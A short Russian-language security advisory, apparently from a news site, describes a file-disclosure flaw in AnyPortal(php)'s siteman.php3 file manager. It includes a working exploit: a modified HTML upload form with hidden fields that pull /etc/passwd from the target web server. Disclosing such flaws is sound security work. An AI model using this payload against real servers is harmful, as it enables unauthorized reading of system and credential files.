AnyPortal(php) обеспечивает серфинг по файловой системе Вашего сайта. Недостаток нескольких страховочных проверок безопасности позволяет хакеру просмотреть содержимое любого читабельного файла (например /etc/passwd 🙂

Детали атаки:
Скачайте файл http://www.example.com/siteman000510/siteman.php3?A=U&D= на Ваш жесткий диск и переименуйте его в что-нибудь вроде "upload.html".

Теперь нужно изменить следующую часть кода:
<FORM ENCTYPE="multipart/form-data" METHOD="POST"
 ACTION="/siteman000510/siteman.php3">
DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>

На:
<FORM ENCTYPE="multipart/form-data" METHOD="POST"
 ACTION="http://www.example.com/siteman000510/siteman.php3">
DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
<INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"></P>
<INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd">

Это позволит Вам извлечь файл с паролями с веб-сервера.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии